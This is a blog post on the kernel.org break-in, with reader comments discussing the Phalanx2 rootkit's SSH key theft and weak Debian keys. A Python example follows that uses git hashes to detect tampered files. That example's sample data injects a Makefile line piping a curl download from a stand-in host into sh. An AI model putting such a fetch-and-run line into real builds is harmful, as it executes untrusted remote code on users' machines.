Attack on Kernel.org

From information published on the web we know:

  1. servers at kernel.org were under the control of intruders until August 28,
  2. the attack lasted more than two weeks and involved Phalanx, which snaffles SSH keys.

It is possible that this is an echo of the infamous weak SSH keys in Debian, although Netcraft lists the site as running Fedora. All it would take is a system administrator generating keys on a Debian GNU/Linux system years ago and spreading them around… If the Fedora system did not detect them, the intruders could have walked in easily.

About Robert Pogson

I am a retired teacher in Canada. I taught in the subject areas where I have worked for almost forty years: maths, physics, chemistry and computers. I love hunting, fishing, picking berries and mushrooms, too.
This entry was posted in technology.

11 Responses to Attack on Kernel.org

  1. oiaohm says:

    Robert Pogson, yep, unobtrusively is not exactly what Phalanx2 is known for.

    Some of Phalanx2 escalation methods are very much like pulling the fire alarm and hoping no one notices.

    Thinking Phalanx2 and Phalanx were designed to demo a fault. /dev/kmem disappeared, rendering Phalanx non-operational. Phalanx2 uses /dev/mem. This disappears when we can get to KMS as standard.

    twitter, all the reports are out on the mailing lists. Linux to Linux is rare but annoying. Also, it is a good time to do a check of the keys you are using.

    Now the fun part is finding the person who did it. Was it just a script kiddie out for some kicks or someone more evil?

  2. twitter says:

    I will wait and see that someone did not simply give their password to an OS X or Windows keylogger. China worked their way into Google through Windows and this is why Google has banned Windows use. Non-free software seems to be the easy route into any place. Reports express surprise that Phalanx was used because it’s a script kiddie tool. It’s like they did not know how to exploit the opportunity they had.

  3. “Trojan initially discovered due to the Xnest /dev/mem error message w/o Xnest installed; have been seen on other systems.” see Kernel.org

    Let me understand your point. You believe that Phalanx2 causes kernel panics as it unobtrusively goes about the business of hiding a rootkit???! –begin sarcasm– Why doesn’t it just trip the fire alarm or something bold to signal its presence? –end sarcasm–

  4. oiaohm says:

    Robert Pogson, the admin of kernel.org does in one report mention an unstable, crashing server being investigated among the servers taken offline.

    Phalanx2 is very Linux-targeted. In fact it is an x86 Linux ELF file with a Python assist script (the Python script is what nicks the SSH keys).

    kernel.org does not have /dev/mem; that is one of the attacks Phalanx2 uses, Xnest trying to access /dev/mem. In fact kernel.org servers take offense to that being accessed, so kernel panic.

    So there is a probability that kernel.org was never breached to root level, due to the security set up. Problem is you have to presume the worst.

    Phalanx2 was on the developer's machine and the kernel.org server. That is why we can be 100 percent sure it is Linux to Linux with a remote machine in the middle. Of course the controller of the Phalanx2 could have used any SSH client to upload it into kernel.org and the first breached developer.

    Biggest issue here is Phalanx is an open-source rootkit solution to attack Linux. So we know the attacker using it could have the source code.

    So this attack, scary enough, could be just a script kiddie out for a few kicks.

    “Phalanx2 bugger” << I was referring to the person controlling it. So you can bet the attacker knew they were hitting kernel.org.

  5. There is no mention of a crash, just some error messages. Presumably Phalanx files could be dropped by any SSH client with a key for root.

  6. oiaohm says:

    twitter, I am sorry to say the infection being Phalanx2 rules out the possibility of Windows or OS X. Yes, it is one of the Linux-only infections out there. I know they are rare.

    Yes, the developer that was the source of infection with kernel.org reported being breached by it. One of the common ways Phalanx2 gets an entry path into the first system is a weak SSH key generated on a Debian system. This could have been a simple oversight. Yes, coders are busy.

    Issue is, once it is in, the Phalanx2 bugger trees from there, infecting as many systems as possible. Yes, Phalanx2 is a Linux network's worst nightmare at times.

    Yes, the exact person who was the source to kernel.org is known. This is rare in Windows virus infection cases. Issue is we don’t know who the attacker was who got him.

    Robert Pogson, the key thing to remember about Phalanx2 is that it contains a stack of privilege escapes for Linux. So even if it gets in as quite a low user it can dig its way up.

    This digging its way up is what drew attention to it, since a kernel.org server was crashing with strange logs.

    Due to the variations in the Phalanx2 privilege escapes that can ship with it, it is wiser to presume root was breached than to presume the other way. Particularly if it turns out to be not Phalanx2 but a new form that detects as Phalanx2.

  7. Well, root was accessed. Weak SSH key for root would be the quickest/easiest way to exploit that. No password-guessing required.

  8. twitter says:

    I think it is too early to blame Debian’s weak keys. It is more probable that a developer trusted a weaker OS such as OS X or Windows and the compromise rolled from there. A chain is only as strong as its weakest link and, sadly, there are free software developers who have not learned to reject non-free software out of hand yet.

  9. Yep. When that issue was revealed I had to scramble to clean up my systems. I did OK except that I had moved on and only had contact with my personal machines and server. I still had backups with the keys appearing years later.

    I depend on OpenSSH for so much. It is so cool to be able to control a cluster as if they were one machine. It gave me a sick feeling in the stomach when the weak keys were found.

  10. oiaohm says:

    Robert Pogson, you missed it. Phalanx2 is a direct descendant of Phalanx, and Phalanx was the first major attacker against weak SSH keys.

    Phalanx2 is worse. When it gets into a system it raids the SSH key stores it can get its hands on. Password or not. It then sends all that information to the attacker.

    The attacker can then attempt to brute force password protected keys.

    So the main server was not running Debian. But what was H. Peter Anvin running? Possibly Debian, due to the fact he is one of the Debian maintainers for kernel work.

    This is most likely not an echo but a direct result of that past issue. Just catching up to us now. One old key lying on his system leading to it being breached and it cascading to kernel.org.

    Even so, the broken kernel.org really did not put the git repo at risk, thinking git is designed to be on an untrusted server and detect someone trying to tamper with it. Question now is what to do about the tar.gz and tar.bz2 archives generated and signed.

    So due to the second layer of git the damage is quite minimal. Annoying and time consuming. But minimal.

    My 3-layer systems sound insane until something like this happens near you. 1 layer of auth is just not enough. 1 layer is too simple to steal or breach.
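The comment above leans on git being safe to host on an untrusted server because every object is named by the hash of its content. As an added example (not code from the post or from kernel.org), this Python recomputes git's blob and tree object names with nothing but hashlib, then compares objects fetched from an untrusted mirror against the IDs recorded in a trusted clone; the file contents and IDs are constructed for the demonstration, and only plain files (no subdirectories) are handled in the tree hash.

```python
import hashlib


def git_object_id(kind: str, body: bytes) -> str:
    """Return the SHA-1 name git gives an object: sha1("<kind> <len>\\0" + body)."""
    header = f"{kind} {len(body)}\0".encode()
    return hashlib.sha1(header + body).hexdigest()


def git_blob_id(content: bytes) -> str:
    """Object name of a file's content, identical to `git hash-object`."""
    return git_object_id("blob", content)


def git_tree_id(entries) -> str:
    """Object name of a tree. entries: iterable of (mode, name, blob_hex_id).

    Assumption for this example: entries are plain files only, so sorting by
    name matches git's ordering (git sorts directories as if named "name/").
    """
    body = b""
    for mode, name, hex_id in sorted(entries, key=lambda e: e[1]):
        body += f"{mode} {name}\0".encode() + bytes.fromhex(hex_id)
    return git_object_id("tree", body)


def find_tampered_files(trusted_tree: dict, fetched_files: dict) -> list:
    """Recompute each fetched file's blob ID and report names whose content no
    longer matches the ID recorded in the trusted tree, plus files whose
    content is missing. trusted_tree: {name: blob_id}; fetched_files: {name: bytes}.
    """
    bad = []
    for name, expected in sorted(trusted_tree.items()):
        data = fetched_files.get(name)
        if data is None or git_blob_id(data) != expected:
            bad.append(name)
    return bad


# Constructed sample: a trusted clone recorded these two files' blob IDs ...
TRUSTED_FILES = {"Makefile": b"all:\n\tgcc -o a a.c\n", "a.c": b"int main(){}\n"}
TRUSTED_TREE = {n: git_blob_id(c) for n, c in TRUSTED_FILES.items()}
TRUSTED_TREE_ID = git_tree_id([("100644", n, i) for n, i in TRUSTED_TREE.items()])

# ... and a mirror later served a Makefile with an extra line injected.
FETCHED_FROM_MIRROR = dict(TRUSTED_FILES)
FETCHED_FROM_MIRROR["Makefile"] += b"\tcurl http://example.invalid | sh\n"

if __name__ == "__main__":
    print("trusted tree:", TRUSTED_TREE_ID)
    print("tampered files:", find_tampered_files(TRUSTED_TREE, FETCHED_FROM_MIRROR))
```

The same recomputation is what `git fsck` does for every object in a clone, and because a commit names its tree and a tree names its blobs, one known-good commit ID pins the whole checkout.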
